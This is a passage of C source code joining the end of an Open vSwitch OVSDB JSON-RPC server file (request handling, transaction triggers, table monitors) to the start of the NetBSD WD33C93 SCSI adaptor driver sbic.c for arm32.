norm, this is fine. */ if (list_is_empty(&remote->sessions)) { return; } s = CONTAINER_OF(remote->sessions.next, struct ovsdb_jsonrpc_session, node); js = s->js; if (!js) { return; } name = jsonrpc_session_get_name(js); status = xzalloc(sizeof *status); shash_add(shash, name, status); status->is_connected = jsonrpc_session_is_connected(js); status->last_error = jsonrpc_session_get_status(js); jsonrpc_session_get_reconnect_stats(js, &rstats); status->state = rstats.state; status->sec_since_connect = rstats.msec_since_connect == UINT_MAX ? UINT_MAX : rstats.msec_since_connect / 1000; status->sec_since_disconnect = rstats.msec_since_disconnect == UINT_MAX ? UINT_MAX : rstats.msec_since_disconnect / 1000; return; } static const char * get_db_name(const struct ovsdb_jsonrpc_session *s) { return s->remote->server->db->schema->name; } static struct jsonrpc_msg * ovsdb_jsonrpc_check_db_name(const struct ovsdb_jsonrpc_session *s, const struct jsonrpc_msg *request) { struct json_array *params; const char *want_db_name; const char *have_db_name; struct ovsdb_error *error; struct jsonrpc_msg *reply; params = json_array(request->params); if (!params->n || params->elems[0]->type != JSON_STRING) { error = ovsdb_syntax_error( request->params, NULL, "%s request params must begin with <db-name>", request->method); goto error; } want_db_name = params->elems[0]->u.string; have_db_name = get_db_name(s); if (strcmp(want_db_name, have_db_name)) { error = ovsdb_syntax_error( request->params, "unknown database", "%s request specifies unknown database %s", request->method, want_db_name); goto error; } return NULL; error: reply = jsonrpc_create_reply(ovsdb_error_to_json(error), request->id); ovsdb_error_destroy(error); return reply; } static struct jsonrpc_msg * execute_transaction(struct ovsdb_jsonrpc_session *s, struct jsonrpc_msg *request) { ovsdb_jsonrpc_trigger_create(s, request->id, request->params); request->id = NULL; request->params = NULL; jsonrpc_msg_destroy(request); return NULL; } static void ovsdb_jsonrpc_session_got_request(struct ovsdb_jsonrpc_session *s, struct jsonrpc_msg *request) { struct jsonrpc_msg *reply; if (!strcmp(request->method, "transact")) { reply = ovsdb_jsonrpc_check_db_name(s, request); if (!reply) { reply = execute_transaction(s, request); } } else if (!strcmp(request->method, "monitor")) { reply = ovsdb_jsonrpc_check_db_name(s, request); if (!reply) { reply = jsonrpc_create_reply( ovsdb_jsonrpc_monitor_create(s, request->params), request->id); } } else if (!strcmp(request->method, "monitor_cancel")) { reply = ovsdb_jsonrpc_monitor_cancel(s, json_array(request->params), request->id); } else if (!strcmp(request->method, "get_schema")) { reply = ovsdb_jsonrpc_check_db_name(s, request); if (!reply) { reply = jsonrpc_create_reply( ovsdb_schema_to_json(s->remote->server->db->schema), request->id); } } else if (!strcmp(request->method, "list_dbs")) { reply = jsonrpc_create_reply( json_array_create_1(json_string_create(get_db_name(s))), request->id); } else if (!strcmp(request->method, "echo")) { reply = jsonrpc_create_reply(json_clone(request->params), request->id); } else { reply = jsonrpc_create_error(json_string_create("unknown method"), request->id); } if (reply) { jsonrpc_msg_destroy(request); jsonrpc_session_send(s->js, reply); } } static void execute_cancel(struct ovsdb_jsonrpc_session *s, struct jsonrpc_msg *request) { if (json_array(request->params)->n == 1) { struct ovsdb_jsonrpc_trigger *t; struct json *id; id = request->params->u.array.elems[0]; t = ovsdb_jsonrpc_trigger_find(s, id, json_hash(id, 0)); if (t) { ovsdb_jsonrpc_trigger_complete(t); } } } static void ovsdb_jsonrpc_session_got_notify(struct ovsdb_jsonrpc_session *s, struct jsonrpc_msg *request) { if (!strcmp(request->method, "cancel")) { execute_cancel(s, request); } jsonrpc_msg_destroy(request); } /* JSON-RPC database server triggers. * * (Every transaction is treated as a trigger even if it doesn't actually have * any "wait" operations.) */ struct ovsdb_jsonrpc_trigger { struct ovsdb_trigger trigger; struct ovsdb_jsonrpc_session *session; struct hmap_node hmap_node; /* In session's "triggers" hmap. */ struct json *id; }; static void ovsdb_jsonrpc_trigger_create(struct ovsdb_jsonrpc_session *s, struct json *id, struct json *params) { struct ovsdb_jsonrpc_trigger *t; size_t hash; /* Check for duplicate ID. */ hash = json_hash(id, 0); t = ovsdb_jsonrpc_trigger_find(s, id, hash); if (t) { struct jsonrpc_msg *msg; msg = jsonrpc_create_error(json_string_create("duplicate request ID"), id); jsonrpc_session_send(s->js, msg); json_destroy(id); json_destroy(params); return; } /* Insert into trigger table. */ t = xmalloc(sizeof *t); ovsdb_trigger_init(s->remote->server->db, &t->trigger, params, &s->completions, time_msec()); t->session = s; t->id = id; hmap_insert(&s->triggers, &t->hmap_node, hash); /* Complete early if possible. */ if (ovsdb_trigger_is_complete(&t->trigger)) { ovsdb_jsonrpc_trigger_complete(t); } } static struct ovsdb_jsonrpc_trigger * ovsdb_jsonrpc_trigger_find(struct ovsdb_jsonrpc_session *s, const struct json *id, size_t hash) { struct ovsdb_jsonrpc_trigger *t; HMAP_FOR_EACH_WITH_HASH (t, hmap_node, hash, &s->triggers) { if (json_equal(t->id, id)) { return t; } } return NULL; } static void ovsdb_jsonrpc_trigger_complete(struct ovsdb_jsonrpc_trigger *t) { struct ovsdb_jsonrpc_session *s = t->session; if (jsonrpc_session_is_connected(s->js)) { struct jsonrpc_msg *reply; struct json *result; result = ovsdb_trigger_steal_result(&t->trigger); if (result) { reply = jsonrpc_create_reply(result, t->id); } else { reply = jsonrpc_create_error(json_string_create("canceled"), t->id); } jsonrpc_session_send(s->js, reply); } json_destroy(t->id); ovsdb_trigger_destroy(&t->trigger); hmap_remove(&s->triggers, &t->hmap_node); free(t); } static void ovsdb_jsonrpc_trigger_complete_all(struct ovsdb_jsonrpc_session *s) { struct ovsdb_jsonrpc_trigger *t, *next; HMAP_FOR_EACH_SAFE (t, next, hmap_node, &s->triggers) { ovsdb_jsonrpc_trigger_complete(t); } } static void ovsdb_jsonrpc_trigger_complete_done(struct ovsdb_jsonrpc_session *s) { while (!list_is_empty(&s->completions)) { struct ovsdb_jsonrpc_trigger *t = CONTAINER_OF(s->completions.next, struct ovsdb_jsonrpc_trigger, trigger.node); ovsdb_jsonrpc_trigger_complete(t); } } /* JSON-RPC database table monitors. */ enum ovsdb_jsonrpc_monitor_selection { OJMS_INITIAL = 1 << 0, /* All rows when monitor is created. */ OJMS_INSERT = 1 << 1, /* New rows. */ OJMS_DELETE = 1 << 2, /* Deleted rows. */ OJMS_MODIFY = 1 << 3 /* Modified rows. */ }; /* A particular column being monitored. */ struct ovsdb_jsonrpc_monitor_column { const struct ovsdb_column *column; enum ovsdb_jsonrpc_monitor_selection select; }; /* A particular table being monitored. */ struct ovsdb_jsonrpc_monitor_table { const struct ovsdb_table *table; /* This is the union (bitwise-OR) of the 'select' values in all of the * members of 'columns' below. */ enum ovsdb_jsonrpc_monitor_selection select; /* Columns being monitored. */ struct ovsdb_jsonrpc_monitor_column *columns; size_t n_columns; }; /* A collection of tables being monitored. */ struct ovsdb_jsonrpc_monitor { struct ovsdb_replica replica; struct ovsdb_jsonrpc_session *session; struct hmap_node node; /* In ovsdb_jsonrpc_session's "monitors". */ struct json *monitor_id; struct shash tables; /* Holds "struct ovsdb_jsonrpc_monitor_table"s. */ }; static const struct ovsdb_replica_class ovsdb_jsonrpc_replica_class; struct ovsdb_jsonrpc_monitor *ovsdb_jsonrpc_monitor_find( struct ovsdb_jsonrpc_session *, const struct json *monitor_id); static void ovsdb_jsonrpc_monitor_destroy(struct ovsdb_replica *); static struct json *ovsdb_jsonrpc_monitor_get_initial( const struct ovsdb_jsonrpc_monitor *); static bool parse_bool(struct ovsdb_parser *parser, const char *name, bool default_value) { const struct json *json; json = ovsdb_parser_member(parser, name, OP_BOOLEAN | OP_OPTIONAL); return json ? json_boolean(json) : default_value; } struct ovsdb_jsonrpc_monitor * ovsdb_jsonrpc_monitor_find(struct ovsdb_jsonrpc_session *s, const struct json *monitor_id) { struct ovsdb_jsonrpc_monitor *m; HMAP_FOR_EACH_WITH_HASH (m, node, json_hash(monitor_id, 0), &s->monitors) { if (json_equal(m->monitor_id, monitor_id)) { return m; } } return NULL; } static void ovsdb_jsonrpc_add_monitor_column(struct ovsdb_jsonrpc_monitor_table *mt, const struct ovsdb_column *column, enum ovsdb_jsonrpc_monitor_selection select, size_t *allocated_columns) { struct ovsdb_jsonrpc_monitor_column *c; if (mt->n_columns >= *allocated_columns) { mt->columns = x2nrealloc(mt->columns, allocated_columns, sizeof *mt->columns); } c = &mt->columns[mt->n_columns++]; c->column = column; c->select = select; } static int compare_ovsdb_jsonrpc_monitor_column(const void *a_, const void *b_) { const struct ovsdb_jsonrpc_monitor_column *a = a_; const struct ovsdb_jsonrpc_monitor_column *b = b_; return a->column < b->column ? -1 : a->column > b->column; } static struct ovsdb_error * WARN_UNUSED_RESULT ovsdb_jsonrpc_parse_monitor_request(struct ovsdb_jsonrpc_monitor_table *mt, const struct json *monitor_request, size_t *allocated_columns) { const struct ovsdb_table_schema *ts = mt->table->schema; enum ovsdb_jsonrpc_monitor_selection select; const struct json *columns, *select_json; struct ovsdb_parser parser; struct ovsdb_error *error; ovsdb_parser_init(&parser, monitor_request, "table %s", ts->name); columns = ovsdb_parser_member(&parser, "columns", OP_ARRAY | OP_OPTIONAL); select_json = ovsdb_parser_member(&parser, "select", OP_OBJECT | OP_OPTIONAL); error = ovsdb_parser_finish(&parser); if (error) { return error; } if (select_json) { select = 0; ovsdb_parser_init(&parser, select_json, "table %s select", ts->name); if (parse_bool(&parser, "initial", true)) { select |= OJMS_INITIAL; } if (parse_bool(&parser, "insert", true)) { select |= OJMS_INSERT; } if (parse_bool(&parser, "delete", true)) { select |= OJMS_DELETE; } if (parse_bool(&parser, "modify", true)) { select |= OJMS_MODIFY; } error = ovsdb_parser_finish(&parser); if (error) { return error; } } else { select = OJMS_INITIAL | OJMS_INSERT | OJMS_DELETE | OJMS_MODIFY; } mt->select |= select; if (columns) { size_t i; if (columns->type != JSON_ARRAY) { return ovsdb_syntax_error(columns, NULL, "array of column names expected"); } for (i = 0; i < columns->u.array.n; i++) { const struct ovsdb_column *column; const char *s; if (columns->u.array.elems[i]->type != JSON_STRING) { return ovsdb_syntax_error(columns, NULL, "array of column names expected"); } s = columns->u.array.elems[i]->u.string; column = shash_find_data(&mt->table->schema->columns, s); if (!column) { return ovsdb_syntax_error(columns, NULL, "%s is not a valid " "column name", s); } ovsdb_jsonrpc_add_monitor_column(mt, column, select, allocated_columns); } } else { struct shash_node *node; SHASH_FOR_EACH (node, &ts->columns) { const struct ovsdb_column *column = node->data; if (column->index != OVSDB_COL_UUID) { ovsdb_jsonrpc_add_monitor_column(mt, column, select, allocated_columns); } } } return NULL; } static struct json * ovsdb_jsonrpc_monitor_create(struct ovsdb_jsonrpc_session *s, struct json *params) { struct ovsdb_jsonrpc_monitor *m = NULL; struct json *monitor_id, *monitor_requests; struct ovsdb_error *error = NULL; struct shash_node *node; struct json *json; if (json_array(params)->n != 3) { error = ovsdb_syntax_error(params, NULL, "invalid parameters"); goto error; } monitor_id = params->u.array.elems[1]; monitor_requests = params->u.array.elems[2]; if (monitor_requests->type != JSON_OBJECT) { error = ovsdb_syntax_error(monitor_requests, NULL, "monitor-requests must be object"); goto error; } if (ovsdb_jsonrpc_monitor_find(s, monitor_id)) { error = ovsdb_syntax_error(monitor_id, NULL, "duplicate monitor ID"); goto error; } m = xzalloc(sizeof *m); ovsdb_replica_init(&m->replica, &ovsdb_jsonrpc_replica_class); ovsdb_add_replica(s->remote->server->db, &m->replica); m->session = s; hmap_insert(&s->monitors, &m->node, json_hash(monitor_id, 0)); m->monitor_id = json_clone(monitor_id); shash_init(&m->tables); SHASH_FOR_EACH (node, json_object(monitor_requests)) { const struct ovsdb_table *table; struct ovsdb_jsonrpc_monitor_table *mt; size_t allocated_columns; const struct json *mr_value; size_t i; table = ovsdb_get_table(s->remote->server->db, node->name); if (!table) { error = ovsdb_syntax_error(NULL, NULL, "no table named %s", node->name); goto error; } mt = xzalloc(sizeof *mt); mt->table = table; shash_add(&m->tables, table->schema->name, mt); /* Parse columns. */ mr_value = node->data; allocated_columns = 0; if (mr_value->type == JSON_ARRAY) { const struct json_array *array = &mr_value->u.array; for (i = 0; i < array->n; i++) { error = ovsdb_jsonrpc_parse_monitor_request( mt, array->elems[i], &allocated_columns); if (error) { goto error; } } } else { error = ovsdb_jsonrpc_parse_monitor_request( mt, mr_value, &allocated_columns); if (error) { goto error; } } /* Check for duplicate columns. */ qsort(mt->columns, mt->n_columns, sizeof *mt->columns, compare_ovsdb_jsonrpc_monitor_column); for (i = 1; i < mt->n_columns; i++) { if (mt->columns[i].column == mt->columns[i - 1].column) { error = ovsdb_syntax_error(mr_value, NULL, "column %s " "mentioned more than once", mt->columns[i].column->name); goto error; } } } return ovsdb_jsonrpc_monitor_get_initial(m); error: if (m) { ovsdb_remove_replica(s->remote->server->db, &m->replica); } json = ovsdb_error_to_json(error); ovsdb_error_destroy(error); return json; } static struct jsonrpc_msg * ovsdb_jsonrpc_monitor_cancel(struct ovsdb_jsonrpc_session *s, struct json_array *params, const struct json *request_id) { if (params->n != 1) { return jsonrpc_create_error(json_string_create("invalid parameters"), request_id); } else { struct ovsdb_jsonrpc_monitor *m; m = ovsdb_jsonrpc_monitor_find(s, params->elems[0]); if (!m) { return jsonrpc_create_error(json_string_create("unknown monitor"), request_id); } else { ovsdb_remove_replica(s->remote->server->db, &m->replica); return jsonrpc_create_reply(json_object_create(), request_id); } } } static void ovsdb_jsonrpc_monitor_remove_all(struct ovsdb_jsonrpc_session *s) { struct ovsdb_jsonrpc_monitor *m, *next; HMAP_FOR_EACH_SAFE (m, next, node, &s->monitors) { ovsdb_remove_replica(s->remote->server->db, &m->replica); } } static struct ovsdb_jsonrpc_monitor * ovsdb_jsonrpc_monitor_cast(struct ovsdb_replica *replica) { assert(replica->class == &ovsdb_jsonrpc_replica_class); return CONTAINER_OF(replica, struct ovsdb_jsonrpc_monitor, replica); } struct ovsdb_jsonrpc_monitor_aux { bool initial; /* Sending initial contents of table? */ const struct ovsdb_jsonrpc_monitor *monitor; struct json *json; /* JSON for the whole transaction. */ /* Current table. */ struct ovsdb_jsonrpc_monitor_table *mt; struct json *table_json; /* JSON for table's transaction. */ }; static bool any_reportable_change(const struct ovsdb_jsonrpc_monitor_table *mt, const unsigned long int *changed) { size_t i; for (i = 0; i < mt->n_columns; i++) { const struct ovsdb_jsonrpc_monitor_column *c = &mt->columns[i]; unsigned int idx = c->column->index; if (c->select & OJMS_MODIFY && bitmap_is_set(changed, idx)) { return true; } } return false; } static bool ovsdb_jsonrpc_monitor_change_cb(const struct ovsdb_row *old, const struct ovsdb_row *new, const unsigned long int *changed, void *aux_) { struct ovsdb_jsonrpc_monitor_aux *aux = aux_; const struct ovsdb_jsonrpc_monitor *m = aux->monitor; struct ovsdb_table *table = new ? new->table : old->table; enum ovsdb_jsonrpc_monitor_selection type; struct json *old_json, *new_json; struct json *row_json; char uuid[UUID_LEN + 1]; size_t i; if (!aux->mt || table != aux->mt->table) { aux->mt = shash_find_data(&m->tables, table->schema->name); aux->table_json = NULL; if (!aux->mt) { /* We don't care about rows in this table at all. Tell the caller * to skip it. */ return false; } } type = (aux->initial ? OJMS_INITIAL : !old ? OJMS_INSERT : !new ? OJMS_DELETE : OJMS_MODIFY); if (!(aux->mt->select & type)) { /* We don't care about this type of change (but do want to be called * back for changes to other rows in the same table). */ return true; } if (type == OJMS_MODIFY && !any_reportable_change(aux->mt, changed)) { /* Nothing of interest changed. */ return true; } old_json = new_json = NULL; if (type & (OJMS_DELETE | OJMS_MODIFY)) { old_json = json_object_create(); } if (type & (OJMS_INITIAL | OJMS_INSERT | OJMS_MODIFY)) { new_json = json_object_create(); } for (i = 0; i < aux->mt->n_columns; i++) { const struct ovsdb_jsonrpc_monitor_column *c = &aux->mt->columns[i]; const struct ovsdb_column *column = c->column; unsigned int idx = c->column->index; if (!(type & c->select)) { /* We don't care about this type of change for this particular * column (but we will care about it for some other column). */ continue; } if ((type == OJMS_MODIFY && bitmap_is_set(changed, idx)) || type == OJMS_DELETE) { json_object_put(old_json, column->name, ovsdb_datum_to_json(&old->fields[idx], &column->type)); } if (type & (OJMS_INITIAL | OJMS_INSERT | OJMS_MODIFY)) { json_object_put(new_json, column->name, ovsdb_datum_to_json(&new->fields[idx], &column->type)); } } /* Create JSON object for transaction overall. */ if (!aux->json) { aux->json = json_object_create(); } /* Create JSON object for transaction on this table. */ if (!aux->table_json) { aux->table_json = json_object_create(); json_object_put(aux->json, aux->mt->table->schema->name, aux->table_json); } /* Create JSON object for transaction on this row. */ row_json = json_object_create(); if (old_json) { json_object_put(row_json, "old", old_json); } if (new_json) { json_object_put(row_json, "new", new_json); } /* Add JSON row to JSON table. */ snprintf(uuid, sizeof uuid, UUID_FMT, UUID_ARGS(ovsdb_row_get_uuid(new ? new : old))); json_object_put(aux->table_json, uuid, row_json); return true; } static void ovsdb_jsonrpc_monitor_init_aux(struct ovsdb_jsonrpc_monitor_aux *aux, const struct ovsdb_jsonrpc_monitor *m, bool initial) { aux->initial = initial; aux->monitor = m; aux->json = NULL; aux->mt = NULL; aux->table_json = NULL; } static struct ovsdb_error * ovsdb_jsonrpc_monitor_commit(struct ovsdb_replica *replica, const struct ovsdb_txn *txn, bool durable OVS_UNUSED) { struct ovsdb_jsonrpc_monitor *m = ovsdb_jsonrpc_monitor_cast(replica); struct ovsdb_jsonrpc_monitor_aux aux; ovsdb_jsonrpc_monitor_init_aux(&aux, m, false); ovsdb_txn_for_each_change(txn, ovsdb_jsonrpc_monitor_change_cb, &aux); if (aux.json) { struct jsonrpc_msg *msg; struct json *params; params = json_array_create_2(json_clone(aux.monitor->monitor_id), aux.json); msg = jsonrpc_create_notify("update", params); jsonrpc_session_send(aux.monitor->session->js, msg); } return NULL; } static struct json * ovsdb_jsonrpc_monitor_get_initial(const struct ovsdb_jsonrpc_monitor *m) { struct ovsdb_jsonrpc_monitor_aux aux; struct shash_node *node; ovsdb_jsonrpc_monitor_init_aux(&aux, m, true); SHASH_FOR_EACH (node, &m->tables) { struct ovsdb_jsonrpc_monitor_table *mt = node->data; if (mt->select & OJMS_INITIAL) { struct ovsdb_row *row; HMAP_FOR_EACH (row, hmap_node, &mt->table->rows) { ovsdb_jsonrpc_monitor_change_cb(NULL, row, NULL, &aux); } } } return aux.json ? aux.json : json_object_create(); } static void ovsdb_jsonrpc_monitor_destroy(struct ovsdb_replica *replica) { struct ovsdb_jsonrpc_monitor *m = ovsdb_jsonrpc_monitor_cast(replica); struct shash_node *node; json_destroy(m->monitor_id); SHASH_FOR_EACH (node, &m->tables) { struct ovsdb_jsonrpc_monitor_table *mt = node->data; free(mt->columns); free(mt); } shash_destroy(&m->tables); hmap_remove(&m->session->monitors, &m->node); free(m); } static const struct ovsdb_replica_class ovsdb_jsonrpc_replica_class = { ovsdb_jsonrpc_monitor_commit, ovsdb_jsonrpc_monitor_destroy };
627772.c
/* $NetBSD: sbic.c,v 1.9 1997/10/14 22:27:41 mark Exp $ */ /* * Copyright (c) 1994 Christian E. Hopps * Copyright (c) 1990 The Regents of the University of California. * All rights reserved. * * This code is derived from software contributed to Berkeley by * Van Jacobson of Lawrence Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * from: sbic.c,v 1.21 1996/01/07 22:01:54 */ #define UNPROTECTED_CSR #define DEBUG /*#define SBIC_DEBUG*/ /* * WD 33C93 scsi adaptor driver */ #include <sys/param.h> #include <sys/systm.h> #include <sys/device.h> #include <sys/kernel.h> /* For hz */ #include <sys/disklabel.h> #include <sys/dkstat.h> #include <sys/buf.h> #include <dev/scsipi/scsi_all.h> #include <dev/scsipi/scsipi_all.h> #include <dev/scsipi/scsiconf.h> #include <vm/vm.h> #include <vm/vm_kern.h> #include <vm/vm_page.h> /*#include <machine/pmap.h> #include <machine/cpu.h>*/ #include <machine/io.h> #include <machine/irqhandler.h> #include <arm32/podulebus/podulebus.h> #include <arm32/podulebus/sbicreg.h> #include <arm32/podulebus/sbicvar.h> #include <arm32/podulebus/ascreg.h> /* These are for bounce buffers */ /*#include <vm/pmap.h>*/ /* Since I can't find this in any other header files */ #define SCSI_PHASE(reg) (reg&0x07) /* * SCSI delays * In u-seconds, primarily for state changes on the SPC. */ #define SBIC_CMD_WAIT 50000 /* wait per step of 'immediate' cmds */ #define SBIC_DATA_WAIT 50000 /* wait per data in/out step */ #define SBIC_INIT_WAIT 50000 /* wait per step (both) during init */ #define b_cylin b_resid #define SBIC_WAIT(regs, until, timeo) sbicwait(regs, until, timeo, __LINE__) extern u_int kvtop(); int sbicicmd __P((struct sbic_softc *, int, int, void *, int, void *, int)); int sbicgo __P((struct sbic_softc *, struct scsipi_xfer *)); int sbicdmaok __P((struct sbic_softc *, struct scsipi_xfer *)); int sbicwait __P((sbic_regmap_p, char, int , int)); int sbiccheckdmap __P((void *, u_long, u_long)); int sbicselectbus __P((struct sbic_softc *, sbic_regmap_p, u_char, u_char, u_char)); int sbicxfstart __P((sbic_regmap_p, int, u_char, int)); int sbicxfout __P((sbic_regmap_p regs, int, void *, int)); int sbicfromscsiperiod __P((struct sbic_softc *, sbic_regmap_p, int)); int sbictoscsiperiod __P((struct sbic_softc *, sbic_regmap_p, int)); int sbicintr __P((struct sbic_softc *)); int sbicpoll __P((struct sbic_softc *)); int sbicnextstate __P((struct sbic_softc *, u_char, u_char)); int sbicmsgin __P((struct sbic_softc *)); int sbicxfin __P((sbic_regmap_p regs, int, void *)); int sbicabort __P((struct sbic_softc *, sbic_regmap_p, char *)); void sbicxfdone __P((struct sbic_softc *, sbic_regmap_p, int)); void sbicerror __P((struct sbic_softc *, sbic_regmap_p, u_char)); void sbicstart __P((struct sbic_softc *)); void sbicreset __P((struct sbic_softc *)); void sbic_scsidone __P((struct sbic_acb *, int)); void sbic_sched __P((struct sbic_softc *)); void sbic_save_ptrs __P((struct sbic_softc *, sbic_regmap_p,int,int)); void sbic_load_ptrs __P((struct sbic_softc *, sbic_regmap_p,int,int)); /* * Synch xfer parameters, and timing conversions */ int sbic_min_period = SBIC_SYN_MIN_PERIOD; /* in cycles = f(ICLK,FSn) */ int sbic_max_offset = SBIC_SYN_MAX_OFFSET; /* pure number */ int sbic_cmd_wait = SBIC_CMD_WAIT; int sbic_data_wait = SBIC_DATA_WAIT; int sbic_init_wait = SBIC_INIT_WAIT; /* * was broken before.. now if you want this you get it for all drives * on sbic controllers. */ u_char sbic_inhibit_sync[8]; int sbic_enable_reselect = 1; int sbic_clock_override = 0; int sbic_no_dma = 1; /* was 0 */ int sbic_parallel_operations = 1; #ifdef DEBUG sbic_regmap_p debug_sbic_regs; int sbicdma_ops = 0; /* total DMA operations */ int sbicdma_bounces = 0; /* number operations using bounce buffer */ int sbicdma_hits = 0; /* number of DMA chains that were contiguous */ int sbicdma_misses = 0; /* number of DMA chains that were not contiguous */ int sbicdma_saves = 0; #define QPRINTF(a) if (sbic_debug > 1) printf a int sbic_debug = 0; int sync_debug = 0; int sbic_dma_debug = 0; int reselect_debug = 0; int report_sense = 0; int data_pointer_debug = 0; u_char debug_asr, debug_csr, routine; void sbictimeout __P((struct sbic_softc *dev)); void sbic_dump __P((struct sbic_softc *dev)); #define CSR_TRACE_SIZE 32 #if CSR_TRACE_SIZE #define CSR_TRACE(w,c,a,x) do { \ int s = splbio(); \ csr_trace[csr_traceptr].whr = (w); csr_trace[csr_traceptr].csr = (c); \ csr_trace[csr_traceptr].asr = (a); csr_trace[csr_traceptr].xtn = (x); \ /* dma_cachectl(&csr_trace[csr_traceptr], sizeof(csr_trace[0]));*/ \ csr_traceptr = (csr_traceptr + 1) & (CSR_TRACE_SIZE - 1); \ /* dma_cachectl(&csr_traceptr, sizeof(csr_traceptr));*/ \ splx(s); \ } while (0) int csr_traceptr; int csr_tracesize = CSR_TRACE_SIZE; struct { u_char whr; u_char csr; u_char asr; u_char xtn; } csr_trace[CSR_TRACE_SIZE]; #else #define CSR_TRACE #endif #define SBIC_TRACE_SIZE 0 #if SBIC_TRACE_SIZE #define SBIC_TRACE(dev) do { \ int s = splbio(); \ sbic_trace[sbic_traceptr].sp = &s; \ sbic_trace[sbic_traceptr].line = __LINE__; \ sbic_trace[sbic_traceptr].sr = s; \ sbic_trace[sbic_traceptr].csr = csr_traceptr; \ /* dma_cachectl(&sbic_trace[sbic_traceptr], sizeof(sbic_trace[0]));*/ \ sbic_traceptr = (sbic_traceptr + 1) & (SBIC_TRACE_SIZE - 1); \ /* dma_cachectl(&sbic_traceptr, sizeof(sbic_traceptr));*/ \ /* if (dev) dma_cachectl(dev, sizeof(*dev));*/ \ splx(s); \ } while (0) int sbic_traceptr; int sbic_tracesize = SBIC_TRACE_SIZE; struct { void *sp; u_short line; u_short sr; int csr; } sbic_trace[SBIC_TRACE_SIZE]; #else #define SBIC_TRACE(dev) #endif #else #define QPRINTF #define CSR_TRACE #define SBIC_TRACE #endif /* * default minphys routine for sbic based controllers */ void sbic_minphys(bp) struct buf *bp; { /* * No max transfer at this level. */ minphys(bp); } /* * Save DMA pointers. Take into account partial transfer. Shut down DMA. */ void sbic_save_ptrs(dev, regs, target, lun) struct sbic_softc *dev; sbic_regmap_p regs; int target, lun; { int count, asr, s; /* int csr; */ /* unsigned long ptr;*/ /* char *vptr;*/ struct sbic_acb* acb; /* extern vm_offset_t vm_first_phys;*/ SBIC_TRACE(dev); if( !dev->sc_cur ) return; if( !(dev->sc_flags & SBICF_INDMA) ) return; /* DMA not active */ s = splbio(); acb = dev->sc_nexus; count = -1; do { GET_SBIC_asr(regs, asr); if( asr & SBIC_ASR_DBR ) { printf("sbic_save_ptrs: asr %02x canceled!\n", asr); splx(s); SBIC_TRACE(dev); return; } } while( asr & (SBIC_ASR_BSY|SBIC_ASR_CIP) ); /* Save important state */ /* must be done before dmastop */ acb->sc_dmacmd = dev->sc_dmacmd; SBIC_TC_GET(regs, count); /* Shut down DMA ====CAREFUL==== */ dev->sc_dmastop(dev); dev->sc_flags &= ~SBICF_INDMA; SBIC_TC_PUT(regs, 0); #ifdef DEBUG if(!count && sbic_debug) printf("%dcount0",target); if(data_pointer_debug == -1) printf("SBIC saving target %d data pointers from (%p,%x)%xASR:%02x", target, dev->sc_cur->dc_addr, dev->sc_cur->dc_count, acb->sc_dmacmd, asr); #endif /* Fixup partial xfers */ acb->sc_kv.dc_addr += (dev->sc_tcnt - count); acb->sc_kv.dc_count -= (dev->sc_tcnt - count); acb->sc_pa.dc_addr += (dev->sc_tcnt - count); acb->sc_pa.dc_count -= ((dev->sc_tcnt - count)>>1); acb->sc_tcnt = dev->sc_tcnt = count; #ifdef DEBUG if(data_pointer_debug) printf(" at (%p,%x):%x\n", dev->sc_cur->dc_addr, dev->sc_cur->dc_count,count); sbicdma_saves++; #endif splx(s); SBIC_TRACE(dev); } /* * DOES NOT RESTART DMA!!! */ void sbic_load_ptrs(dev, regs, target, lun) struct sbic_softc *dev; sbic_regmap_p regs; int target, lun; { int s, count; /* int i, asr;*/ char* vaddr; /* char* paddr;*/ struct sbic_acb *acb; SBIC_TRACE(dev); acb = dev->sc_nexus; if( !acb->sc_kv.dc_count ) { /* No data to xfer */ SBIC_TRACE(dev); return; } s = splbio(); dev->sc_last = dev->sc_cur = &acb->sc_pa; dev->sc_tcnt = acb->sc_tcnt; dev->sc_dmacmd = acb->sc_dmacmd; #ifdef DEBUG sbicdma_ops++; #endif if( !dev->sc_tcnt ) { /* sc_tcnt == 0 implies end of segment */ /* do kvm to pa mappings */ #if 0 /* mark */ paddr = acb->sc_pa.dc_addr = (char *) kvtop(acb->sc_kv.dc_addr); #endif vaddr = acb->sc_kv.dc_addr; count = acb->sc_kv.dc_count; #if 0 /* mark */ for(count = (NBPG - ((int)vaddr & PGOFSET)); count < acb->sc_kv.dc_count && (char*)kvtop(vaddr + count + 4) == paddr + count + 4; count += NBPG); #endif /* If it's all contiguous... */ if(count > acb->sc_kv.dc_count ) { count = acb->sc_kv.dc_count; #ifdef DEBUG sbicdma_hits++; #endif } else { #ifdef DEBUG sbicdma_misses++; #endif } acb->sc_tcnt = count; acb->sc_pa.dc_count = count >> 1; #ifdef DEBUG if(data_pointer_debug) printf("DMA recalc:kv(%p,%x)pa(%p,%lx)\n", acb->sc_kv.dc_addr, acb->sc_kv.dc_count, acb->sc_pa.dc_addr, acb->sc_tcnt); #endif } splx(s); #ifdef DEBUG if(data_pointer_debug) printf("SBIC restoring target %d data pointers at (%p,%x)%x\n", target, dev->sc_cur->dc_addr, 